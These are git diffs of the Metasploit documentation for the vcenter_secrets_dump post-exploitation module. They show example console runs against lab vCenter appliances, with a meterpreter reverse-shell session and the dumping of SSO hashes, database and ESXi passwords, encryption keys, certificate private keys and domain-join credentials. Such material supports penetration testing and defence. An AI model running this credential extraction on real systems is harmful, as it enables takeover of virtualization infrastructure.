+[+] vSphere SSO User Credential: cn=vmca/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$b478eb780a9f43960541a236b4f258bf9d7726f76d6f9d13f25fc815bac002b191be96a90c87bf607b54e13769878b5863cde7eb12b151db5c5892e9b00e5f48$HEX$a56c39678fd290619f726e31c5d6fce8
+[+] vSphere SSO User Credential: cn=ldap/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$efeb6777719ccb7278a6c216e3a307bc0a4a9ecbf240a36a6947161dbd44e143cb8fa9712f2629e7022bb2bcdf3c144b7ecbbc499f15dd3791e920205ec7fcba$HEX$bb3eddcba08bf93c372f23a45c5fb651
+[+] vSphere SSO User Credential: cn=DNS/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$059761db3117ce52c864cf5dab7b6320f47d0e09c1ff3afaa0835fe4775aa0669a09ee26412e15bfc8337a9747e73e4ffab1859292e716dba0e92104708332a6$HEX$4629f7e9c587f6d1b57b2f56e96bf05a
+[+] vSphere SSO User Credential: cn=host/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$6b11a2b58752e8409f57bc72b45e6599209714000b8a17e95d661663d54d691ce013be2700fa6c8e30e6d98259d1810c5f883fcc8099bd16342e6a4c0d179895$HEX$2a14a8f480ca071f6edffd3720732d5d
 [*] Processing SSO identity sources ...
 [*] Found SSO Identity Source Credential:
-[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://vcenter02.cesium137.io:389:
-[+] SSOUSER: vpsc01.cesium137.io@vsphere.local
-[+] SSOPASS: prfFHx`4I|e!$1hJZn]q
-[+] SSODOMAIN: vsphere.local
+[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://vcenterdelta.cesium137.io:389:
+[+]       SSOUSER: vcenterdelta.cesium137.io@delta.vsphere.local
+[+]       SSOPASS: *6{ K3Ei*@<J[.gd5c3o
+[+]     SSODOMAIN: delta.vsphere.local
 [*] Found SSO Identity Source Credential:
-[+] IDENTITY_STORE_TYPE_ACTIVE_DIRECTORY @ ldap://cesium137.io:
-[+] SSOUSER: vSphereSvc@cesium137.io
-[+] SSOPASS: %XkAl222bvCCx46VB
-[+] SSODOMAIN: cesium137.io
+[+] IDENTITY_STORE_TYPE_LDAP_WITH_AD_MAPPING @ ldap://cesium137.io:
+[+]       SSOUSER: CESIUM137\ldap
+[+]       SSOPASS: ThisIsSecret!
+[+]     SSODOMAIN: cesium137.io
 [*] Extracting certificates from vSphere platform ...
-[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220503143431_dev_192.168.100.11_vmca_584377.key
-[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220503143432_dev_192.168.100.11_vmca_373989.pem
-[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220503143434_dev_192.168.100.11_idp_495008.key
-[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220503143434_dev_192.168.100.11_idp_590306.pem
-[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220503143436_dev_192.168.100.11___MACHINE_CERT_035985.key
-[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220503143437_dev_192.168.100.11___MACHINE_CERT_047549.pem
-[+] MACHINE key: /home/cs137/.msf4/loot/20220503143440_dev_192.168.100.11_machine_352224.key
-[+] MACHINE cert: /home/cs137/.msf4/loot/20220503143440_dev_192.168.100.11_machine_590500.pem
-[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220503143442_dev_192.168.100.11_vspherewebclien_717603.key
-[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220503143443_dev_192.168.100.11_vspherewebclien_499228.pem
-[+] VPXD key: /home/cs137/.msf4/loot/20220503143445_dev_192.168.100.11_vpxd_493932.key
-[+] VPXD cert: /home/cs137/.msf4/loot/20220503143445_dev_192.168.100.11_vpxd_945960.pem
-[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220503143447_dev_192.168.100.11_vpxdextension_661250.key
-[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220503143448_dev_192.168.100.11_vpxdextension_184377.pem
-[+] SMS key: /home/cs137/.msf4/loot/20220503143450_dev_192.168.100.11_sms_self_signed_108815.key
-[+] SMS cert: /home/cs137/.msf4/loot/20220503143450_dev_192.168.100.11_sms_self_signed_717860.pem
-[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220503143453_dev_192.168.100.11_dataenciphermen_619118.key
-[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220503143454_dev_192.168.100.11_dataenciphermen_976218.pem
-[+] HVC key: /home/cs137/.msf4/loot/20220503143456_dev_192.168.100.11_hvc_722861.key
-[+] HVC cert: /home/cs137/.msf4/loot/20220503143456_dev_192.168.100.11_hvc_786924.pem
-[+] WCP key: /home/cs137/.msf4/loot/20220503143458_dev_192.168.100.11_wcp_253108.key
-[+] WCP cert: /home/cs137/.msf4/loot/20220503143459_dev_192.168.100.11_wcp_046781.pem
+[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220504162042_default_192.168.100.70_vmca_603049.key
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220504162042_default_192.168.100.70_vmca_882434.pem
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220504162044_default_192.168.100.70_idp_836918.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220504162044_default_192.168.100.70_idp_500987.pem
+[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220504162046_default_192.168.100.70___MACHINE_CERT_032048.key
+[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220504162047_default_192.168.100.70___MACHINE_CERT_559717.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220504162050_default_192.168.100.70_machine_503081.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220504162051_default_192.168.100.70_machine_646697.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220504162052_default_192.168.100.70_vspherewebclien_812043.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220504162053_default_192.168.100.70_vspherewebclien_959067.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220504162055_default_192.168.100.70_vpxd_194878.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220504162056_default_192.168.100.70_vpxd_153814.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220504162057_default_192.168.100.70_vpxdextension_878062.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220504162058_default_192.168.100.70_vpxdextension_623838.pem
+[+] HVC key: /home/cs137/.msf4/loot/20220504162100_default_192.168.100.70_hvc_452066.key
+[+] HVC cert: /home/cs137/.msf4/loot/20220504162100_default_192.168.100.70_hvc_307290.pem
+[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220504162102_default_192.168.100.70_dataenciphermen_478118.key
+[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220504162103_default_192.168.100.70_dataenciphermen_345609.pem
+[+] SMS key: /home/cs137/.msf4/loot/20220504162105_default_192.168.100.70_sms_self_signed_858005.key
+[+] SMS cert: /home/cs137/.msf4/loot/20220504162106_default_192.168.100.70_sms_self_signed_095121.pem
+[+] WCP key: /home/cs137/.msf4/loot/20220504162108_default_192.168.100.70_wcp_982089.key
+[+] WCP cert: /home/cs137/.msf4/loot/20220504162108_default_192.168.100.70_wcp_984591.pem
 [*] Searching for secrets in VM Guest Customization Specification XML ...
-[*] Processing vpx_customization_spec 'Windows 10 Enterprise' ...
+[*] Processing vpx_customization_spec 'Good Win10 Template with Local and Domain Join' ...
+[*] Validating data encipherment key ...
+[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
+[+]     Initial Admin PW: SamIAm!
+[*] AD domain join account found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
+[+]     AD User: administrator@cesium137.io
+[+]     AD Pass: IAmSam!
+[*] Processing vpx_customization_spec 'Borked Win10 Template' ...
 [*] Validating data encipherment key ...
 [!] Could not associate encryption public key with any of the private keys extracted from vCenter, skipping
-[*] Processing vpx_customization_spec 'Windows Server 2016 Datacenter' ...
+[*] Processing vpx_customization_spec 'Good Win10 Template with Local' ...
 [*] Validating data encipherment key ...
-[*] Initial administrator account password found for vpx_customization_spec 'Windows Server 2016 Datacenter':
-[+] Built-in administrator PW: IAmSam!
-[*] AD domain join account found for vpx_customization_spec 'Windows Server 2016 Datacenter':
-[+] AD User: vSphereSvc@cesium137.io
-[+] AD Pass: SamIAm!
+[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local':
+[+]     Initial Admin PW: SamIAm!
 [*] Post module execution completed
+msf6 post(linux/gather/vcenter_secrets_dump) > 
 ```
 
-Example run from vCenter 6.0 Update 3j
+Example run from meterpreter session on vCenter appliance version 6.0 U3j
 
 ```
 msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
@@ -159,16 +153,22 @@ msf6 post(linux/gather/vcenter_secrets_dump) > dump
 [*] vSphere Hostname and IPv4: vcenteralpha [192.168.100.60]
 [+] vSphere SSO DC DN: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
 [+] vSphere SSO DC PW: <PMW{T:4mnb@UBs/$f(w
-[*] Extract vmdird tenant AES encryption keys ...
-[+] vSphere Tenant AES encryption key: (>d%>D3'i@rAj}!" hex: 283e64253e443327694072416a7d2122
+[*] Extract vmdird tenant AES encryption key ...
+[+] vSphere Tenant AES encryption
+        KEY: (>d%>D3'i@rAj}!"
+        HEX: 283e64253e443327694072416a7d2122
 [*] Extract vmware-vpx AES key ...
-[+] vmware-vpx AES encryption key hex: acdeb90515681eb8c357e3a94312106934f174324c39d1deb012337effc124de
+[+] vSphere vmware-vpx AES encryption
+        HEX: acdeb90515681eb8c357e3a94312106934f174324c39d1deb012337effc124de
 [*] Extracting PostgreSQL database credentials ...
-[+] VCDB Name: VCDB User: vc PW: 4yFcqZ2$m^&H<K?z
+[+]     VCDB Name: VCDB
+[+]     VCDB User: vc
+[+]     VCDB Pass: 4yFcqZ2$m^&H<K?z
 [*] Extract ESXi host vpxuser credentials ...
+[!] No ESXi hosts attached to this vCenter system
 [*] Extracting vSphere SSO domain secrets ...
 [*] Dumping vmdir schema to LDIF ...
-[+] LDIF Dump: /home/cs137/.msf4/loot/20220503144159_dev_192.168.100.60_vmdir_157656.ldif
+[+] LDIF Dump: /home/cs137/.msf4/loot/20220504162417_default_192.168.100.60_vmdir_757761.ldif
 [*] Processing vmdir LDIF (this may take several minutes) ...
 [*] Processing LDIF entries ...
 [*] Processing SSO account hashes ...
@@ -183,30 +183,31 @@ msf6 post(linux/gather/vcenter_secrets_dump) > dump
 [*] Processing SSO identity sources ...
 [*] Found SSO Identity Source Credential:
 [+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
-[+] SSOUSER: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,DC=alpha,DC=vsphere,DC=local
-[+] SSOPASS: <PMW{T:4mnb@UBs/$f(w
-[+] SSODOMAIN: alpha.vsphere.local
+[+]       SSOUSER: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,DC=alpha,DC=vsphere,DC=local
+[+]       SSOPASS: <PMW{T:4mnb@UBs/$f(w
+[+]     SSODOMAIN: alpha.vsphere.local
 [*] Extracting certificates from vSphere platform ...
-[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220503144201_dev_192.168.100.60_vmca_075148.key
-[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220503144201_dev_192.168.100.60_vmca_217694.pem
+[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220504162419_default_192.168.100.60_vmca_525753.key
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220504162419_default_192.168.100.60_vmca_840227.pem
 [!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files ...
 [-] Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM
 [!] Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work
-[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220503144203_dev_192.168.100.60_idp_658848.key
-[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220503144203_dev_192.168.100.60_idp_801629.pem
-[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220503144206_dev_192.168.100.60___MACHINE_CERT_215002.key
-[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220503144206_dev_192.168.100.60___MACHINE_CERT_468549.pem
-[+] MACHINE key: /home/cs137/.msf4/loot/20220503144209_dev_192.168.100.60_machine_609849.key
-[+] MACHINE cert: /home/cs137/.msf4/loot/20220503144210_dev_192.168.100.60_machine_688132.pem
-[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220503144212_dev_192.168.100.60_vspherewebclien_019807.key
-[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220503144212_dev_192.168.100.60_vspherewebclien_683531.pem
-[+] VPXD key: /home/cs137/.msf4/loot/20220503144214_dev_192.168.100.60_vpxd_431794.key
-[+] VPXD cert: /home/cs137/.msf4/loot/20220503144215_dev_192.168.100.60_vpxd_798188.pem
-[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220503144217_dev_192.168.100.60_vpxdextension_621629.key
-[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220503144217_dev_192.168.100.60_vpxdextension_661698.pem
-[+] SMS key: /home/cs137/.msf4/loot/20220503144219_dev_192.168.100.60_sms_self_signed_130806.key
-[+] SMS cert: /home/cs137/.msf4/loot/20220503144220_dev_192.168.100.60_sms_self_signed_905150.pem
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220504162421_default_192.168.100.60_idp_482598.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220504162421_default_192.168.100.60_idp_805228.pem
+[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220504162424_default_192.168.100.60___MACHINE_CERT_193219.key
+[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220504162424_default_192.168.100.60___MACHINE_CERT_071831.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220504162428_default_192.168.100.60_machine_480281.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220504162428_default_192.168.100.60_machine_368258.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220504162430_default_192.168.100.60_vspherewebclien_464390.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220504162431_default_192.168.100.60_vspherewebclien_445076.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220504162432_default_192.168.100.60_vpxd_397207.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220504162433_default_192.168.100.60_vpxd_425995.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220504162435_default_192.168.100.60_vpxdextension_185899.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220504162436_default_192.168.100.60_vpxdextension_485039.pem
+[+] SMS key: /home/cs137/.msf4/loot/20220504162437_default_192.168.100.60_sms_self_signed_823426.key
+[+] SMS cert: /home/cs137/.msf4/loot/20220504162438_default_192.168.100.60_sms_self_signed_711433.pem
 [*] Searching for secrets in VM Guest Customization Specification XML ...
 [!] No vpx_customization_spec entries evident
 [*] Post module execution completed
+msf6 post(linux/gather/vcenter_secrets_dump) >
 ```

--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -26,6 +26,23 @@ access.
 
 Which session to use, which can be viewed with `sessions -l`
 
+## Advanced Options
+**DUMP_VMDIR**
+
+Boolean value that controls whether the module will attempt to extract vSphere SSO domain
+information, including SSO user hashes and a complete LDIF dump of the SSO directory. Defaults
+to true.
+
+**DUMP_VMAFD**
+
+Boolean value that controls whether the module will attempt to extract vSphere certificates, private
+keys, and secrets. Defaults to true.
+
+**DUMP_SPEC**
+
+If DUMP_VMAFD is also true, attempt to extract VM Guest Customization secrets from PSQL using the
+DATA-ENCIPHERMENT key extracted from VMAFD. Defaults to true.
+
 ## Scenarios
 Example run from meterpreter session on vCenter appliance version 7.0.2
 
@@ -44,7 +61,7 @@ msf6 exploit(multi/handler) > exploit
 
 [*] Started reverse TCP handler on 192.168.101.10:4444 
 [*] Sending stage (989032 bytes) to 192.168.100.11
-[*] Meterpreter session 1 opened (192.168.101.10:4444 -> 192.168.100.11:53410 ) at 2022-04-17 19:04:00 -0400
+[*] Meterpreter session 1 opened (192.168.101.10:4444 -> 192.168.100.11:53410 ) at 2022-04-28 16:22:17 -0400
 
 meterpreter > bg
 [*] Backgrounding session 1...
@@ -53,27 +70,44 @@ msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
 session => 1
 msf6 post(linux/gather/vcenter_secrets_dump) > dump
 
-[*] Gathering vSphere SSO Domain Information ...
+[*] Gathering vSphere SSO domain information ...
 [*] vSphere Hostname and IPv4: vcenteralpha.cesium137.io [192.168.100.11]
 [+] vSphere SSO DC DN: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
-[+] vSphere SSO DC PW: .Awo;Z1Zwd>x_b=h1FQ'}
-[*] Extracting certificates from vSphere platform ...
-[+] VMCA_ROOT key: /root/.msf4/loot/20220427093946_default_192.168.100.11_vmca_509760.key
-[+] VMCA_ROOT cert: /root/.msf4/loot/20220427093946_default_192.168.100.11_vmca_797084.pem
-[+] SSO_STS_IDP key: /root/.msf4/loot/20220427093948_default_192.168.100.11_idp_105611.key
-[+] SSO_STS_IDP cert: /root/.msf4/loot/20220427093948_default_192.168.100.11_idp_779741.pem
-[+] MACHINE_SSL_CERT key: /root/.msf4/loot/20220427093949_default_192.168.100.11_ssl_410730.key
-[+] MACHINE_SSL_CERT cert: /root/.msf4/loot/20220427093950_default_192.168.100.11_ssl_759902.pem
-[+] DATA-ENCIPHERMENT key: /root/.msf4/loot/20220427093950_default_192.168.100.11_data_199784.key
-[+] DATA-ENCIPHERMENT cert: /root/.msf4/loot/20220427093951_default_192.168.100.11_data_119050.pem
+[+] vSphere SSO DC PW: .AwoZ1;wd>x_b=M1FQ'}
 [*] Extracting PostgreSQL database credentials ...
 [+] VCDB Name: VCDB
 [+] VCDB User: vc
-[+] VCDB PW: my!h@)IN4jw$nHT{
+[+] VCDB PW: my6h@)IN1jW$nHT{
+[*] Extracting vSphere SSO domain information ...
+[*] Dumping vmdir schema to LDIF ...
+[+] LDIF Dump: /root/.msf4/loot/20220428162238_default_192.168.100.11_vmdir_339905.ldif
+[*] Processing vmdir LDIF (this may take several minutes) ...
+[*] Processing LDIF entries ...
+[*] Processing SSO account hashes ...
+[+] vSphere SSO User Credential: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f48caa19007e8bb3d76a7d172e2d1976f4747e0ed84159a712eb58156ede7478827909bf4acf9f71b74616ce5110d99b8426d8b3295b02c04aacff3c27607ab8$HEX$9374651ada3414775604fbdb150c8cdc
+[+] vSphere SSO User Credential: CN=waiter 66bac9fd-6a99-43eb-8661-1295c39e9e4d,cn=users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$8335fa00d0498f1028691aced7d8945be0fa1f689dc628a3307ec7918a8fcdb04587ebd8a6dc1b14cacc0c11e4f84c5e022108e0950b62dc63f3f37c0a3b3453$HEX$4108122797d8894b9963e5ac943918b9
+[+] vSphere SSO User Credential: cn=krbtgt/ALPHA.VSPHERE.LOCAL,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$0da378937caf846413b0a9a328e9fe901513bddddea9a0de5ca520f4d7eca9d2eeb7287a26f0d079941bb46df36a5b321c53b807e59c55b10bb62ff260e28021$HEX$266ca458d66911df01347b372939ae2a
+[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$c20ca496510e8e6a0d3d9aa470dfe0baf06ccfb2ecc2e4952d232859e8fc22ccd3108926eb115574043652157db3f1d557af1cd1580190546178758eee57834a$HEX$22209783f4c187b777a31c2a814c2ff7
+[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f96cd214646ba2e4e21774a183f18572bc3d6c4174801d0523cbdc04d02bf69b102bfe9d68fdd71c5866f4972b2359516e65f59c4bda6eebd3cdca59b5f55be8$HEX$4f267135b496ff3119afc21fefda8643
+[+] vSphere SSO User Credential: cn=vmca/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ee963a2f36d38a73e5cf4be729e7be4f491c97fc91b3e9bed96216de9bf72914d1442c49650b07366e9347369ce892d823e06613195027e3f44dfd50662b98dc$HEX$842fdf0b5b972c8f722fb3139142231d
+[+] vSphere SSO User Credential: cn=ldap/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$85523e5ad2ac353b925a0cc9f0fad88c881b17d5b218fdd568fb819a7bc58abf7e8783013e22468c657cae7f776ec77fb8b0ad815ef5cdc6ea114c701f19fa52$HEX$4faf7011a11a4939216a1211a4b08cea
+[+] vSphere SSO User Credential: cn=DNS/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ad40b15f98588bc0c856a0f881ea857d6f3442a6755b9c33e40c7960d1833414d25ef96120f9416fca96d0ecfe3df6ddc1e992e5881baeacdcc4610bd43eda79$HEX$f3d9e1c742d9342c78c1825ab5b7efee
+[+] vSphere SSO User Credential: cn=host/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$bbcb9c30d8c1a40f409d24fe6ede60df7bf4860a9bdd50b146d063a194fdadb0df80d81ea5ea48a377f20709fa1c22f696facde785b160ceb0eb92eb5f8c5308$HEX$5fab6ef4332396fb4b4410cca448d52d
+[*] Extracting certificates from vSphere platform ...
+[+] VMCA_ROOT key: /root/.msf4/loot/20220428162239_default_192.168.100.11_vmca_411348.key
+[+] VMCA_ROOT cert: /root/.msf4/loot/20220428162239_default_192.168.100.11_vmca_551671.pem
+[+] SSO_STS_IDP key: /root/.msf4/loot/20220428162241_default_192.168.100.11_idp_775724.key
+[+] SSO_STS_IDP cert: /root/.msf4/loot/20220428162241_default_192.168.100.11_idp_747430.pem
+[+] MACHINE_SSL_CERT key: /root/.msf4/loot/20220428162241_default_192.168.100.11_ssl_134237.key
+[+] MACHINE_SSL_CERT cert: /root/.msf4/loot/20220428162242_default_192.168.100.11_ssl_373472.pem
+[+] DATA-ENCIPHERMENT key: /root/.msf4/loot/20220428162243_default_192.168.100.11_data_033857.key
+[+] DATA-ENCIPHERMENT cert: /root/.msf4/loot/20220428162243_default_192.168.100.11_data_727693.pem
 [*] Searching for secrets in VM Guest Customization Specification XML ...
-[*] Initial administrator account password found
+[*] Initial administrator account password found for vpx_customization_spec 'Windows 10 Ent No Domain Join':
+[+] Built-in administrator PW: IAmSam!
+[*] Initial administrator account password found for vpx_customization_spec 'Windows 10 Ent':
 [+] Built-in administrator PW: Metasploit1$
-[*] AD domain join account found
+[*] AD domain join account found for vpx_customization_spec 'Windows 10 Ent':
 [+] AD User: administrator@cesium137.io
 [+] AD Pass: ThisIsSecret!
 [*] Post module execution completed

--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -54,19 +54,27 @@ session => 1
 msf6 post(linux/gather/vcenter_secrets_dump) > dump
 
 [*] Gathering vSphere SSO Domain Information ...
-[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
-[+] vSphere SSO DC DN: cn=vcenter.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local
-[+] vSphere SSO DC PW: St"7qMYCj)V#PnwS\mw2
+[*] vSphere Hostname and IPv4: vcenteralpha.cesium137.io [192.168.100.11]
+[+] vSphere SSO DC DN: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: .Awo;Z1Zwd>x_b=h1FQ'}
 [*] Extracting certificates from vSphere platform ...
-[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
-[*] Parsing vmwSTSTenantCredential certificates and keys ...
-[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
-[+] => CHA-CHING! <=
-[+] MACHINE_SSL_KEY: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_ssl_120856.key
-[+] MACHINE_SSL_CERT: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_ssl_144111.pem
-[+] VMCA_ROOT_KEY: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_vmca_345006.key
-[+] VMCA_ROOT_CERT: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_vmca_676785.pem
-[+] SSO_STS_IDP_KEY: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_idp_668987.key
-[+] SSO_STS_IDP_CERT: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_idp_126310.pem
+[+] VMCA_ROOT key: /root/.msf4/loot/20220427093946_default_192.168.100.11_vmca_509760.key
+[+] VMCA_ROOT cert: /root/.msf4/loot/20220427093946_default_192.168.100.11_vmca_797084.pem
+[+] SSO_STS_IDP key: /root/.msf4/loot/20220427093948_default_192.168.100.11_idp_105611.key
+[+] SSO_STS_IDP cert: /root/.msf4/loot/20220427093948_default_192.168.100.11_idp_779741.pem
+[+] MACHINE_SSL_CERT key: /root/.msf4/loot/20220427093949_default_192.168.100.11_ssl_410730.key
+[+] MACHINE_SSL_CERT cert: /root/.msf4/loot/20220427093950_default_192.168.100.11_ssl_759902.pem
+[+] DATA-ENCIPHERMENT key: /root/.msf4/loot/20220427093950_default_192.168.100.11_data_199784.key
+[+] DATA-ENCIPHERMENT cert: /root/.msf4/loot/20220427093951_default_192.168.100.11_data_119050.pem
+[*] Extracting PostgreSQL database credentials ...
+[+] VCDB Name: VCDB
+[+] VCDB User: vc
+[+] VCDB PW: my!h@)IN4jw$nHT{
+[*] Searching for secrets in VM Guest Customization Specification XML ...
+[*] Initial administrator account password found
+[+] Built-in administrator PW: Metasploit1$
+[*] AD domain join account found
+[+] AD User: administrator@cesium137.io
+[+] AD Pass: ThisIsSecret!
 [*] Post module execution completed
 ```

--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -52,98 +52,123 @@ msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
 session => 1
 msf6 post(linux/gather/vcenter_secrets_dump) > dump
 
+[*] VMware VirtualCenter 7.0.2 build-18356314
 [*] Gathering vSphere SSO domain information ...
-[*] vSphere Hostname and IPv4: vcenterdelta.cesium137.io [192.168.100.70]
-[+] vSphere SSO DC DN: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local
-[+] vSphere SSO DC PW: *6{ K3Ei*@<J[.gd5c3o
+[*] vSphere Hostname and IPv4: vcenter01.cesium137.io [192.168.100.11]
+[+] vSphere SSO DC DN: cn=vcenter01.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: St!7qiz%33;2Px@A1cfb
 [*] Extract vmdird tenant AES encryption keys ...
-[+] vSphere Tenant AES encryption key: K-Z(x7wf35{E"I2v hex: 0x4b2d5a287837776633357b4522493276
+[+] vSphere Tenant AES encryption key: dyOiAcR(Lx' gp{: hex: 64794f69416352284c78272067707b3a
+[*] Extract vmware-vpx AES key ...
+[+] vmware-vpx AES encryption key hex: b3abd918ce326cf700b77da40b864ed73a6676310e791687e1e025d8d66f690f
 [*] Extracting PostgreSQL database credentials ...
-[+] VCDB Name: VCDB User: vc PW: 6!24A3W5LekCOPK=
-[*] Extracting vSphere SSO domain information ...
+[+] VCDB Name: VCDB User: vc PW: XhsxOKLZ_0{tGC9#
+[*] Extract ESXi host vpxuser credentials ...
+[+] ESXi Host esxi01.cesium137.io [192.168.100.101] vpxuser PW: 3be=IDc}11gs$%v91^JgBO]BlI8}^:]Z
+[+] ESXi Host esxi02.cesium137.io [192.168.100.102] vpxuser PW: 1gp0o7o[~/Fk^b.5x52km\YIl.VsgTK8
+[*] Extracting vSphere SSO domain secrets ...
 [*] Dumping vmdir schema to LDIF ...
-[+] LDIF Dump: /home/cs137/.msf4/loot/20220502094947_default_192.168.100.70_vmdir_313310.ldif
+[+] LDIF Dump: /home/cs137/.msf4/loot/20220503143428_dev_192.168.100.11_vmdir_442200.ldif
 [*] Processing vmdir LDIF (this may take several minutes) ...
 [*] Processing LDIF entries ...
 [*] Processing SSO account hashes ...
